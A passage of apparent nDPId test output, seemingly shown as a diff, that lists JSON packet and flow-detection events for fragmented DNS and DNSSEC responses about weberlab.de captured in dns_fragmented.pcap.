ZXJkbnPAWMBPAAIAAQAAADwABgNuczHBbMBPAC4AAQAAADwBHwACCgIAAAA8XQoA7FzibzWQRwh3ZWJlcmxhYgJkZQB0qMTaqgCspuIcPYiPf3BgfQDsq4tYGfT0QlWt5KJKITRcMICWR4fxmCxHuWlUNejQz2mbGhAzRSlcwKsiD4U6Q+uopuCYgHSJmt\/s0OjDPfudF4BOMw9+KVz84hDd\/4acsdDrEWjA3YvnyyflUhRrCvnRH+6JQJU80RMEvIAITMW4q+myuRsjD9B6QfjeeqqCUKrx5bwtdTeB0NT4gHxxjP3tHJ6Ez+B7TaCbOM5TtNYqTFI7mdspd2h6snRoEpvY7MK1Z3onr5DenD\/f6LB53lBHt6avjWu+uwwUOhqLcoi9In2I6kbfraddRWYM\/kcIQiOffZOZsRUnnKHK\/NLMwYMAHAABAAAOEAAQIAEEcHZbAAAAAAAACiUAU8FoABwAAQAADhAAECABBHAfCxawAAAAAAomAFPBgwABAAEAAA4QAATBGOPuwWgAAQABAAAOEAAEwvcFDsGDAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQCxSs6jI4fQc085O7XtX7BRqKJPIVj7R9A4dqni5pD4gtNCWOOQ49jwEV7+OJGrV9+bQHl4OIsfEGbPnNRiHD2rU2g12XuiewoGY6BET\/nnDTpid7zS7Y\/LN1BquV9W+umqOKnWTehPA142KT1sXmg\/uimXe8rUIwZkTczjR1eAjcGDAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQBBD7f476TWGU2sVH\/4at2erVKbOlwQPWLt9uQcMty7pDI7Tp7ZMWePK7xTYo+\/SKKtxGxsQm+Dw9BFS7QOZSkelOvY2K3W7IddWoZiKuHNL6ASQClSZKX4qKmE15GQqaQ+Q1hJxXO\/t3ZgmbUep+3HS0TBl3lNHnu26Kn\/p7RtMsFoAC4AAQAADhAAnwABCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQAHW3hBW4NpYOIt651fuskLdlXmIsxpk\/6w7e6123vRr4NG7O3Asyr4d5yzXO5X5MN06Mbt4dpvzarwCTZMS0Zq7X8cOvHMsuJZB4S9jSy92NfY76dqptuZmVYMHCcpQfQ5b5NEXqoHoi\/BNRsimfm2CW+D1vl+OXsGia3WBYBr+MFoAC4AAQAADhAAnwAcCAMAAA4QXQoqqlzij64w8Ah3ZWJlcmRucwJkZQC2O9UUXwYnbNfGDKn296Q1feb4wr\/YEE8HV4OyiM\/YXI7FguC3V+KwiuEYnLO8UOUGgTTg1STXeWpc9EeYTA3q8WxKc1b6IIDbOhMAmEXs3UqT+QtwyRceovPAtklderZqHOphjXllMg=="}
00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968018075,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} 00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968018075,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}}
00446{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":112,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":112,"pkt_l4_len":0,"thread_ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVADosQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAFqCR\/DLNPLB7MBpEmmg6EfwC\/W6kpyEkFynJ57OYAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} 00432{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":112,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":112,"pkt_l4_len":0,"thread_ts_msec":1558968018075,"pkt":"AIac51UUAAwpil3Xht1gAmIVADosQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBgAAAAAAAAEFEQAFqCR\/DLNPLB7MBpEmmg6EfwC\/W6kpyEkFynJ57OYAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
00223{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":78,"global_ts_msec":1558968018075} 00209{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":9,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":78,"global_ts_msec":1558968018075}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1558968019069,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1558968019069,"pkt":"AAwpil3XAIac51UUCABFAABXnz0AAGwRsyatwqlowRjj7uhIADUAQ+SwoX0AEAABAAAAAAABA2ZnMgh3ZWJlcmxhYgJkZQAAAQABAAApEAAAAIAAAA8ACAALAAI4ACABBHAfCxY="} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1558968019069,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1558968019069,"pkt":"AAwpil3XAIac51UUCABFAABXnz0AAGwRsyatwqlowRjj7uhIADUAQ+SwoX0AEAABAAAAAAABA2ZnMgh3ZWJlcmxhYgJkZQAAAQABAAApEAAAAIAAAA8ACAALAAI4ACABBHAfCxY="}
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1558968019069,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAXc4hEgAEARds3BGOPurcKpaAA16EgF2oW\/oX2EEAABAAIAAwAJA2ZnMgh3ZWJlcmxhYgJkZQAAAQABwAwAAQABAAAAPAAEwvcECsAMAC4AAQAAADwBHwABCgMAAAA8XQn7nVzibQ2QRwh3ZWJlcmxhYgJkZQBOaoovJdiUPugLXCOcl0\/PGvnmkmgafqH5uIRjFSW+OCQApgZWvY6RTM2L109lkJPX\/BdaujkFp1WFM2ViEYD0n30MdRQHk0QhMV\/J6gKpHA5Eo4g3wXc3jbrRdPm5HA+AO2mdf0nohFA3ceDrf0BJVR+t4aTE3YC3SPWjEPbVRygUN\/DPkWfujCbm8TdE\/oTJOocI+RFIIm+9k74tvqfJHBFL8GButMCMgMH2DEy1ezsYgqWb9PbWKqpr8IzQrfL2dhK\/YxuDKH6eENpOnhaYwpl9HM\/oMoYv4zLHvz3d6QaBadpA15kbMHcFNBVIQkUtQvJhq+yq29KlUiyksXUhwE8AAgABAAAAPAAPA25zMQh3ZWJlcmRuc8BYwE8AAgABAAAAPAAGA25zMsFswE8ALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBaAABAAEAAA4QAATBGOPuwYMAAQABAAAOEAAEwvcFDsFoABwAAQAADhAAECABBHB2WwAAAAAAAAolAFPBgwAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTwWgALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwWgALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywYMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wYMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SV16tmoc6mGNeWUyTywezAaRJpoOhH8Av1upKchJBcpyeezmAAApEAAAAIA="} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1558968019069,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAXc4hEgAEARds3BGOPurcKpaAA16EgF2oW\/oX2EEAABAAIAAwAJA2ZnMgh3ZWJlcmxhYgJkZQAAAQABwAwAAQABAAAAPAAEwvcECsAMAC4AAQAAADwBHwABCgMAAAA8XQn7nVzibQ2QRwh3ZWJlcmxhYgJkZQBOaoovJdiUPugLXCOcl0\/PGvnmkmgafqH5uIRjFSW+OCQApgZWvY6RTM2L109lkJPX\/BdaujkFp1WFM2ViEYD0n30MdRQHk0QhMV\/J6gKpHA5Eo4g3wXc3jbrRdPm5HA+AO2mdf0nohFA3ceDrf0BJVR+t4aTE3YC3SPWjEPbVRygUN\/DPkWfujCbm8TdE\/oTJOocI+RFIIm+9k74tvqfJHBFL8GButMCMgMH2DEy1ezsYgqWb9PbWKqpr8IzQrfL2dhK\/YxuDKH6eENpOnhaYwpl9HM\/oMoYv4zLHvz3d6QaBadpA15kbMHcFNBVIQkUtQvJhq+yq29KlUiyksXUhwE8AAgABAAAAPAAPA25zMQh3ZWJlcmRuc8BYwE8AAgABAAAAPAAGA25zMsFswE8ALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBaAABAAEAAA4QAATBGOPuwYMAAQABAAAOEAAEwvcFDsFoABwAAQAADhAAECABBHB2WwAAAAAAAAolAFPBgwAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTwWgALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwWgALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywYMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wYMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SV16tmoc6mGNeWUyTywezAaRJpoOhH8Av1upKchJBcpyeezmAAApEAAAAIA="}
00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}}
00362{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAAm4hEAuUARm8rBGOPurcKpaAAADwAIAAsAAjgAIAEEcB8LFg=="} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAAm4hEAuUARm8rBGOPurcKpaAAADwAIAAsAAjgAIAEEcB8LFg=="}
00223{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":18,"global_ts_msec":1558968019069} 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":18,"global_ts_msec":1558968019069}
00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1558968021013,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968021013,"pkt":"AAwpil3XAIac51UUht1gBi\/8AEMRayoAFFBADAwAAAAAAAAAAQYgAQRwdlsAAAAAAAAKJQBT1J4ANQBDpiukOAAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1558968021013,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968021013,"pkt":"AAwpil3XAIac51UUht1gBi\/8AEMRayoAFFBADAwAAAAAAAAAAQYgAQRwdlsAAAAAAAAKJQBT1J4ANQBDpiukOAAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -38,8 +38,8 @@
00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
02441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1558968021027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAXciTwgAEARrMjBGOPuSn0viAA158IGrsPBFaiEEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM